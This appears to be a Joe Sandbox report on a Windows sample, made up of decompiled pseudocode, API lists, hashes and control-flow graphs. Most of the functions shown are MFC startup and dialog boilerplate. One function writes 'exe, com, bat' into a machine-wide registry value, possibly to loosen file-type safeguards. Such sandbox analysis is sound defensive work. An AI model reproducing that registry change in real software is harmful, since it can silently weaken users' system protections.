                                                      				_v24 = 0;
                                                      				_v2356 = 0;
                                                      				_v32 = 0;
                                                      				_v20 = 0;
                                                      				_v28 = 0;
                                                      				_t111 =  *0x442014; // 0x43463c
                                                      				_t112 = E004024B0(_v2456,  &_v24, _t111); // executed
                                                      				if(_t112 == 0) {
                                                      					_v32 = 0 | _v24 != 0x00000000;
                                                      				}
                                                      				_t113 =  *0x442018; // 0x434620
                                                      				_t114 = E004024B0(_v2456,  &_v24, _t113); // executed
                                                      				if(_t114 == 0) {
                                                      					_v20 = 0 | _v24 != 0x00000000;
                                                      				}
                                                      				_t115 =  *0x44201c; // 0x434600
                                                      				_t116 = E004024B0(_v2456,  &_v24, _t115); // executed
                                                      				if(_t116 == 0) {
                                                      					_v28 = 0 | _v24 != 0x00000000;
                                                      				}
                                                      				_t117 =  *0x44200c; // 0x434670
                                                      				_t118 = E004024B0(_v2456,  &_v24, _t117); // executed
                                                      				if(_t118 == 0) {
                                                      					_v2356 = 0 | _v24 != 0x00000000;
                                                      				}
                                                      				_t119 =  *0x4349e8; // 0x0
                                                      				_v2352 = _t119;
                                                      				E0041F330(_t201,  &_v2351, 0, 0x7ff);
                                                      				_t183 =  *0x4349e8; // 0x0
                                                      				_v304 = _t183;
                                                      				E0041F330(_t201,  &_v303, 0, 0x103);
                                                      				_t207 = _t205 + 0x18;
                                                      				E004025F0(_v2456,  &_v2352); // executed
                                                      				E00402750(_v2456,  &_v304); // executed
                                                      				 *(_v2456 + 0x130) = _v2356;
                                                      				 *(_v2456 + 0x120) = _v32;
                                                      				 *(_v2456 + 0x124) = _v20;
                                                      				 *(_v2456 + 0x128) = _v28;
                                                      				_v2416 = _v2456 + 0x12c;
                                                      				if( &_v2352 != 0) {
                                                      					_t129 = E0041F2A0( &_v2352);
                                                      					_t207 = _t207 + 4;
                                                      					_v2392 = _t129;
                                                      				} else {
                                                      					_v2392 = 0;
                                                      				}
                                                      				E00402B10(_t141, _v2416,  &_v2352, _v2392);
                                                      				_v2444 = _v2456 + 0x134;
                                                      				_t223 =  &_v304;
                                                      				if( &_v304 != 0) {
                                                      					_v2420 = E0041F2A0( &_v304);
                                                      				} else {
                                                      					_v2420 = 0;
                                                      				}
                                                      				E00402B10(_t141, _v2444,  &_v304, _v2420);
                                                      				_v2448 =  *((intOrPtr*)(E0040DB94(_t141, _t201, _t202, _t223) + 4));
                                                      				_v2452 =  *((intOrPtr*)(E0040DB94(_t141, _t201, _t202, _t223) + 0xc));
                                                      				_t138 = LoadIconA(_v2452, 0x65); // executed
                                                      				 *(_v2456 + 0x74) = _t138;
                                                      				_v8 = 0xffffffff;
                                                      				 *[fs:0x0] = _v16;
                                                      				return E0041E5DF(_v2456, _t141, _v36 ^ _t203, _v2452, _t201, _t202);
                                                      			}

                                                      APIs
                                                        • Part of subcall function 00405CC0: _memset.LIBCMT ref: 00405CD7
                                                        • Part of subcall function 004024B0: RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00401561,00000000,0043463C), ref: 004024E8
                                                        • Part of subcall function 004024B0: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,?,00000000,00000004), ref: 0040251D
                                                        • Part of subcall function 004024B0: RegCloseKey.ADVAPI32(00000000), ref: 00402545
                                                      • _memset.LIBCMT ref: 004015FC
                                                      • _memset.LIBCMT ref: 0040161E
                                                      • _strlen.LIBCMT ref: 004016B8
                                                      • _strlen.LIBCMT ref: 0040170E
                                                      • LoadIconA.USER32(00000000,00000065), ref: 0040175A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: _memset$_strlen$CloseCreateIconLoadQueryValue
                                                      • String ID: FC$<FC$pFC
                                                      • API String ID: 615173687-2136651500
                                                      • Opcode ID: c09a520e972cbed81c92c8a8f446ce9723face874d1e5d1072ee138f9bd11dab
                                                      • Instruction ID: 457884dcc3c456c3af197bac72be006a206e89a30ea0593d6f0c271eb38810d0
                                                      • Opcode Fuzzy Hash: c09a520e972cbed81c92c8a8f446ce9723face874d1e5d1072ee138f9bd11dab
                                                      • Instruction Fuzzy Hash: F3915AB49021189BEB15DF69CD51BEEB7B1AF88308F0041EDE50967382DB786E85CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 418 40619f-4061b5 call 41f71d 421 4061c2-4061e6 call 40db94 call 40c572 * 2 418->421 422 4061b7-4061bf call 40db94 418->422 431 406213 421->431 432 4061e8-4061f8 421->432 422->421 433 406216-406218 431->433 434 4061fa-4061fc 432->434 439 406201-406211 432->439 433->434 435 40621a-40624f call 40ea5e call 40320e call 410cb1 433->435 437 406387-40638c call 41f7c2 434->437 448 406251-406253 435->448 449 406285-406287 435->449 439->433 451 406289-4062bb call 410c7a call 410bd8 call 4108f1 call 4108e3 448->451 452 406255-40625f GetSystemMetrics 448->452 450 4062c8-4062db call 40b748 449->450 449->451 460 4062e1 450->460 461 4062dd-4062df 450->461 451->450 477 4062bd-4062c6 GlobalLock 451->477 452->450 454 406261-406279 call 406177 452->454 454->450 463 40627b-406280 454->463 464 4062e4-4062fd CreateDialogIndirectParamA call 403036 460->464 461->464 463->449 466 406282 463->466 469 406302-406329 464->469 466->449 473 406343-40634a call 409d3f 469->473 474 40632b-406336 469->474 481 406356-406358 473->481 482 40634c-40634e 473->482 474->473 480 406338-40633b 474->480 477->450 480->473 483 406369-40636c 481->483 484 40635a-40635e 481->484 482->481 486 406380-406384 483->486 487 40636e-40637a GlobalUnlock GlobalFree 483->487 484->483 485 406360-406367 DestroyWindow 484->485 485->483 486->437 487->486
                                                      C-Code - Quality: 97%
                                                      			E0040619F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t65;
                                                      				signed int _t72;
                                                      				signed int _t74;
                                                      				struct HWND__* _t75;
                                                      				struct HWND__* _t76;
                                                      				signed int _t78;
                                                      				signed int _t95;
                                                      				intOrPtr* _t103;
                                                      				signed int _t110;
                                                      				void* _t124;
                                                      				signed int _t129;
                                                      				DLGTEMPLATE* _t130;
                                                      				struct HWND__* _t131;
                                                      				void* _t132;
                                                      
                                                      				_t128 = __esi;
                                                      				_t124 = __edx;
                                                      				_t104 = __ecx;
                                                      				_push(0x3c);
                                                      				E0041F71D(E00431E1E, __ebx, __edi, __esi);
                                                      				_t103 = __ecx;
                                                      				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
                                                      				_t136 =  *(_t132 + 0x10);
                                                      				if( *(_t132 + 0x10) == 0) {
                                                      					 *(_t132 + 0x10) =  *(E0040DB94(__ecx, 0, __esi, _t136) + 0xc);
                                                      				}
                                                      				_t129 =  *(E0040DB94(_t103, 0, _t128, _t136) + 0x3c);
                                                      				 *(_t132 - 0x28) = _t129;
                                                      				 *(_t132 - 0x14) = 0;
                                                      				 *(_t132 - 4) = 0;
                                                      				E0040C572(_t103, _t104, 0, _t129, _t136, 0x10); // executed
                                                      				E0040C572(_t103, _t104, 0, _t129, _t136, 0x7c000);
                                                      				if(_t129 == 0) {
                                                      					_t130 =  *(_t132 + 8);
                                                      					L7:
                                                      					__eflags = _t130;
                                                      					if(_t130 == 0) {
                                                      						L4:
                                                      						_t65 = 0;
                                                      						L32:
                                                      						return E0041F7C2(_t65);
                                                      					}
                                                      					E0040320E(_t132 - 0x1c, E0040EA5E());
                                                      					 *(_t132 - 4) = 1;
                                                      					 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                      					__eflags = E00410CB1(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
                                                      					__eflags =  *0x4465cc; // 0x0
                                                      					_t72 = 0 | __eflags == 0x00000000;
                                                      					if(__eflags == 0) {
                                                      						L14:
                                                      						__eflags = _t72;
                                                      						if(__eflags == 0) {
                                                      							L17:
                                                      							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
                                                      							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
                                                      							E0040B748(0, __eflags, _t103);
                                                      							_t74 =  *(_t132 + 0xc);
                                                      							__eflags = _t74;
                                                      							if(_t74 != 0) {
                                                      								_t75 =  *(_t74 + 0x20);
                                                      							} else {
                                                      								_t75 = 0;
                                                      							}
                                                      							_t76 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E00405BFB, 0); // executed
                                                      							_t131 = _t76;
                                                      							E00403036( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
                                                      							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
                                                      							_t110 =  *(_t132 - 0x28);
                                                      							__eflags = _t110;
                                                      							if(__eflags != 0) {
                                                      								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
                                                      								__eflags = _t131;
                                                      								if(__eflags != 0) {
                                                      									 *((intOrPtr*)( *_t103 + 0x12c))(0);
                                                      								}
                                                      							}
                                                      							_t78 = E00409D3F(_t103, 0, __eflags);
                                                      							__eflags = _t78;
                                                      							if(_t78 == 0) {
                                                      								 *((intOrPtr*)( *_t103 + 0x114))();
                                                      							}
                                                      							__eflags = _t131;
                                                      							if(_t131 != 0) {
                                                      								__eflags =  *(_t103 + 0x3c) & 0x00000010;
                                                      								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
                                                      									DestroyWindow(_t131);
                                                      									_t131 = 0;
                                                      									__eflags = 0;
                                                      								}
                                                      							}
                                                      							__eflags =  *(_t132 - 0x14);
                                                      							if( *(_t132 - 0x14) != 0) {
                                                      								GlobalUnlock( *(_t132 - 0x14));
                                                      								GlobalFree( *(_t132 - 0x14));
                                                      							}
                                                      							__eflags = _t131;
                                                      							_t59 = _t131 != 0;
                                                      							__eflags = _t59;
                                                      							_t65 = 0 | _t59;
                                                      							goto L32;
                                                      						}
                                                      						L15:
                                                      						E00410C7A(_t103, _t132 - 0x38, 0, _t132, _t130);
                                                      						 *(_t132 - 4) = 2;
                                                      						E00410BD8(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
                                                      						 *(_t132 - 0x14) = E004108F1(_t132 - 0x38);
                                                      						 *(_t132 - 4) = 1;
                                                      						E004108E3(_t132 - 0x38);
                                                      						__eflags =  *(_t132 - 0x14);
                                                      						if(__eflags != 0) {
                                                      							_t130 = GlobalLock( *(_t132 - 0x14));
                                                      						}
                                                      						goto L17;
                                                      					}
                                                      					__eflags = _t72;
                                                      					if(_t72 != 0) {
                                                      						goto L15;
                                                      					}
                                                      					__eflags = GetSystemMetrics(0x2a);
                                                      					if(__eflags == 0) {
                                                      						goto L17;
                                                      					}
                                                      					_t95 = E00406177(_t132 - 0x1c, "MS Shell Dlg");
                                                      					__eflags = _t95;
                                                      					_t72 = 0 | _t95 == 0x00000000;
                                                      					__eflags = _t72;
                                                      					if(__eflags == 0) {
                                                      						goto L17;
                                                      					}
                                                      					__eflags =  *((short*)(_t132 - 0x18)) - 8;
                                                      					if( *((short*)(_t132 - 0x18)) == 8) {
                                                      						 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                      					}
                                                      					goto L14;
                                                      				}
                                                      				_push(_t132 - 0x48);
                                                      				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
                                                      					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
                                                      					goto L7;
                                                      				}
                                                      				goto L4;
                                                      			}


















                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 004061A6
                                                      • GetSystemMetrics.USER32 ref: 00406257
                                                      • GlobalLock.KERNEL32 ref: 004062C0
                                                      • CreateDialogIndirectParamA.USER32(?,?,?,00405BFB,00000000), ref: 004062EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                      • String ID: MS Shell Dlg
                                                      • API String ID: 1736106359-76309092
                                                      • Opcode ID: 3e4b4bade944808363b2727e551b547ef92d40d9d0212ec3b94de52b8e46ff9f
                                                      • Instruction ID: 0bc490b1034fbbaea528403df064128feb745a9c2e9583e38ab2a070d1ec2b36
                                                      • Opcode Fuzzy Hash: 3e4b4bade944808363b2727e551b547ef92d40d9d0212ec3b94de52b8e46ff9f
                                                      • Instruction Fuzzy Hash: B651BE309002059BCF15EFA4C8859EEBBB4AF44314F15427EF812B72D1DB789A95CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 488 4025f0-402635 RegCreateKeyExA 489 402637-402675 call 41eb60 RegQueryValueExA 488->489 490 4026ab-4026b1 488->490 493 4026a1-4026a5 RegCloseKey 489->493 494 402677-40269e lstrlenA RegSetValueExA 489->494 493->490 494->493
                                                      C-Code - Quality: 100%
                                                      			E004025F0(intOrPtr __ecx, CHAR* _a4) {
                                                      				void* _v8;
                                                      				int _v12;
                                                      				long _v16;
                                                      				int _v20;
                                                      				int _v24;
                                                      				intOrPtr _v28;
                                                      				long _t28;
                                                      				int _t31;
                                                      				long _t34;
                                                      				char* _t38;
                                                      				char* _t41;
                                                      				char* _t44;
                                                      
                                                      				_v28 = __ecx;
                                                      				_v8 = 0;
                                                      				_v16 = 0;
                                                      				_t41 =  *0x442000; // 0x4346d4
                                                      				_v16 = RegCreateKeyExA(0x80000002, _t41, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
                                                      				if(_v16 == 0) {
                                                      					_v24 = 0x800;
                                                      					E0041EB60(_a4, "exe, com, bat");
                                                      					_t38 =  *0x442010; // 0x43465c
                                                      					_t28 = RegQueryValueExA(_v8, _t38, 0,  &_v20, _a4,  &_v24); // executed
                                                      					_v16 = _t28;
                                                      					if(_v16 != 0) {
                                                      						_t31 = lstrlenA(_a4);
                                                      						_t44 =  *0x442010; // 0x43465c
                                                      						_t34 = RegSetValueExA(_v8, _t44, 0, 1, _a4, _t31 + 1); // executed
                                                      						_v16 = _t34;
                                                      					}
                                                      					RegCloseKey(_v8);
                                                      				}
                                                      				return _v16;
                                                      			}
















                                                      APIs
                                                      • RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00401638), ref: 00402628
                                                      • _strcat.LIBCMT ref: 00402647
                                                      • RegQueryValueExA.KERNELBASE(00000000,0043465C,00000000,?,00401638,00000800), ref: 00402668
                                                      • lstrlenA.KERNEL32(00401638), ref: 0040267B
                                                      • RegSetValueExA.KERNELBASE(00000000,0043465C,00000000,00000001,00401638,-00000001), ref: 00402698
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004026A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Value$CloseCreateQuery_strcatlstrlen
                                                      • String ID: \FC$exe, com, bat
                                                      • API String ID: 1958970598-4041655066
                                                      • Opcode ID: 1831c4f7d6f73dd4213caa599944f0336715ca713a20f07bf892c109c3f6860d
                                                      • Instruction ID: 0991be1bcda026a765b55682184bd2232a476c29beda41f33cbd04d81c06e64f
                                                      • Opcode Fuzzy Hash: 1831c4f7d6f73dd4213caa599944f0336715ca713a20f07bf892c109c3f6860d
                                                      • Instruction Fuzzy Hash: F4212CB9E00208FBDB14CFD4DD49FEEB7B8AB48701F108459FA15A7280D6796A04CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 100%
                                                      			E0040EF65(void* __ecx) {
                                                      				int _t5;
                                                      				struct HDC__* _t18;
                                                      				void* _t19;
                                                      
                                                      				_t19 = __ecx; // executed
                                                      				_t5 = GetSystemMetrics(0xb); // executed
                                                      				 *((intOrPtr*)(_t19 + 8)) = _t5;
                                                      				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
                                                      				 *0x446578 = GetSystemMetrics(2) + 1;
                                                      				 *0x44657c = GetSystemMetrics(3) + 1;
                                                      				_t18 = GetDC(0);
                                                      				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
                                                      				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
                                                      				return ReleaseDC(0, _t18);
                                                      			}







                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL ref: 0040EF72
                                                      • GetSystemMetrics.USER32 ref: 0040EF79
                                                      • GetSystemMetrics.USER32 ref: 0040EF80
                                                      • GetSystemMetrics.USER32 ref: 0040EF8A
                                                      • GetDC.USER32(00000000), ref: 0040EF94
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040EFA5
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040EFAD
                                                      • ReleaseDC.USER32 ref: 0040EFB5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                      • String ID:
                                                      • API String ID: 1031845853-0
                                                      • Opcode ID: 994e65a5f7cf09011eb91012667e9cd424a14e7951b27da859b39b4ce86ef113
                                                      • Instruction ID: 97755fa7e18ea7b352d67f311e11813537151e1edd7cb95964a28bf73efd48b3
                                                      • Opcode Fuzzy Hash: 994e65a5f7cf09011eb91012667e9cd424a14e7951b27da859b39b4ce86ef113
                                                      • Instruction Fuzzy Hash: 59F09070A40700AEE3206F72AC49F677BB4EBC6B62F01443AE6518B2D0C7B5A8018F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 76%
                                                      			E0041ACA9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                                                      				void* __esi;
                                                      				signed int _t11;
                                                      				void* _t14;
                                                      				intOrPtr _t17;
                                                      				void* _t18;
                                                      				struct HINSTANCE__* _t19;
                                                      				void* _t31;
                                                      				intOrPtr _t35;
                                                      				void* _t36;
                                                      				void* _t38;
                                                      
                                                      				_t38 = __eflags;
                                                      				_t32 = __edi;
                                                      				_t31 = __edx;
                                                      				_t25 = __ebx;
                                                      				_t11 = SetErrorMode(0); // executed
                                                      				SetErrorMode(_t11 | 0x00008001); // executed
                                                      				_t14 = E0040DB94(__ebx, __edi, SetErrorMode, _t38);
                                                      				_t35 = _a4;
                                                      				 *((intOrPtr*)(_t14 + 8)) = _t35;
                                                      				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
                                                      				E0040D3F7(_t14);
                                                      				_t17 =  *((intOrPtr*)(E0040DB94(__ebx, __edi, _t35, _t38) + 4));
                                                      				_t39 = _t17;
                                                      				if(_t17 != 0) {
                                                      					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
                                                      					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
                                                      					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
                                                      					E0041AB2A(_t17, _t31, _t39);
                                                      				}
                                                      				_t18 = E0040DB94(_t25, _t32, _t35, _t39);
                                                      				_t40 =  *((char*)(_t18 + 0x14));
                                                      				_pop(_t36);
                                                      				if( *((char*)(_t18 + 0x14)) == 0) {
                                                      					E004051C9(_t36, _t40);
                                                      				}
                                                      				_t19 = GetModuleHandleA("user32.dll");
                                                      				if(_t19 != 0) {
                                                      					 *0x4462a4 = GetProcAddress(_t19, "NotifyWinEvent");
                                                      				}
                                                      				return 1;
                                                      			}














                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00000000), ref: 0041ACB2
                                                      • SetErrorMode.KERNELBASE(00000000), ref: 0041ACBA
                                                        • Part of subcall function 0040D3F7: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0040D438
                                                        • Part of subcall function 0040D3F7: SetLastError.KERNEL32(0000006F), ref: 0040D452
                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0041AD0C
                                                      • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0041AD1C
                                                        • Part of subcall function 0041AB2A: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041AB6D
                                                        • Part of subcall function 0041AB2A: PathFindExtensionA.KERNELBASE(?), ref: 0041AB87
                                                        • Part of subcall function 0041AB2A: __strdup.LIBCMT ref: 0041ABC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ErrorModule$FileModeName$AddressExtensionFindHandleLastPathProc__strdup
                                                      • String ID: NotifyWinEvent$user32.dll
                                                      • API String ID: 2454351968-597752486
                                                      • Opcode ID: 616ad4c1b5ded26846f479a85218188d3b388f4c8ca7b456c2135a77635ce7eb
                                                      • Instruction ID: f2694494a373e7eb832031faae720e4f62f99ff10030d8dbc4a867b38e11be65
                                                      • Opcode Fuzzy Hash: 616ad4c1b5ded26846f479a85218188d3b388f4c8ca7b456c2135a77635ce7eb
                                                      • Instruction Fuzzy Hash: 4B01D470A007504FC710EF75D405A5A3BA4AF48700F06846FF444A7392EB38E844CB5E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 94%
                                                      			E0040C572(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                      				intOrPtr _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				char* _v20;
                                                      				signed int _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v52;
                                                      				signed int _v56;
                                                      				void* __ebp;
                                                      				intOrPtr _t122;
                                                      				void* _t128;
                                                      				intOrPtr _t130;
                                                      				signed int _t139;
                                                      				signed int _t144;
                                                      				signed int _t173;
                                                      				signed int _t175;
                                                      				signed int _t177;
                                                      				signed int _t179;
                                                      				signed int _t181;
                                                      				signed int _t183;
                                                      				signed int _t187;
                                                      				void* _t190;
                                                      				intOrPtr _t191;
                                                      				signed int _t201;
                                                      
                                                      				_t190 = __ecx;
                                                      				_t122 = E0040DB94(__ebx, __edi, __esi, __eflags);
                                                      				_v8 = _t122;
                                                      				_t3 =  &_a4;
                                                      				 *_t3 = _a4 &  !( *(_t122 + 0x18));
                                                      				if( *_t3 == 0) {
                                                      					return 1;
                                                      				}
                                                      				_push(__ebx);
                                                      				_push(__esi);
                                                      				_push(__edi);
                                                      				_t201 = 0;
                                                      				E0041F330(0,  &_v56, 0, 0x28);
                                                      				_v52 = DefWindowProcA;
                                                      				_t128 = E0040DB94(__ebx, 0, 0, __eflags);
                                                      				__eflags = _a4 & 0x00000001;
                                                      				_v40 =  *((intOrPtr*)(_t128 + 8));
                                                      				_t130 =  *0x4465b8; // 0x10003
                                                      				_t187 = 8;
                                                      				_v32 = _t130;
                                                      				_v16 = _t187;
                                                      				if(__eflags != 0) {
                                                      					_push( &_v56);
                                                      					_v56 = 0xb;
                                                      					_v20 = "AfxWnd80s";
                                                      					_t183 = E0040C38E(_t187, _t190, 0, 0, __eflags);
                                                      					__eflags = _t183;
                                                      					if(_t183 != 0) {
                                                      						_t201 = 1;
                                                      						__eflags = 1;
                                                      					}
                                                      				}
                                                      				__eflags = _a4 & 0x00000020;
                                                      				if(__eflags != 0) {
                                                      					_v56 = _v56 | 0x0000008b;
                                                      					_push( &_v56);
                                                      					_v20 = "AfxOleControl80s";
                                                      					_t181 = E0040C38E(_t187, _t190, 0, _t201, __eflags);
                                                      					__eflags = _t181;
                                                      					if(_t181 != 0) {
                                                      						_t201 = _t201 | 0x00000020;
                                                      						__eflags = _t201;
                                                      					}
                                                      				}
                                                      				__eflags = _a4 & 0x00000002;
                                                      				if(__eflags != 0) {
                                                      					_push( &_v56);
                                                      					_v56 = 0;
                                                      					_v20 = "AfxControlBar80s";
                                                      					_v28 = 0x10;
                                                      					_t179 = E0040C38E(_t187, _t190, 0, _t201, __eflags);
                                                      					__eflags = _t179;
                                                      					if(_t179 != 0) {
                                                      						_t201 = _t201 | 0x00000002;
                                                      						__eflags = _t201;
                                                      					}
                                                      				}
                                                      				__eflags = _a4 & 0x00000004;
                                                      				if(__eflags != 0) {
                                                      					_v56 = _t187;
                                                      					_v28 = 0;
                                                      					_t177 = E0040C531(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
                                                      					__eflags = _t177;
                                                      					if(_t177 != 0) {
                                                      						_t201 = _t201 | 0x00000004;
                                                      						__eflags = _t201;
                                                      					}
                                                      				}
                                                      				__eflags = _a4 & _t187;
                                                      				if(__eflags != 0) {
                                                      					_v56 = 0xb;
                                                      					_v28 = 6;
                                                      					_t175 = E0040C531(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
                                                      					__eflags = _t175;
                                                      					if(_t175 != 0) {
                                                      						_t201 = _t201 | _t187;
                                                      						__eflags = _t201;
                                                      					}
                                                      				}
                                                      				__eflags = _a4 & 0x00000010;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0xff;
                                                      					_t173 = E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0); // executed
                                                      					_t201 = _t201 | _t173;
                                                      					_t48 =  &_a4;
                                                      					 *_t48 = _a4 & 0xffffc03f;
                                                      					__eflags =  *_t48;
                                                      				}
                                                      				__eflags = _a4 & 0x00000040;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x10;
                                                      					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00000080;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 2;
                                                      					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00000100;
                                                      				if(__eflags != 0) {
                                                      					_v12 = _t187;
                                                      					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00000200;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x20;
                                                      					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00000400;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 1;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00000800;
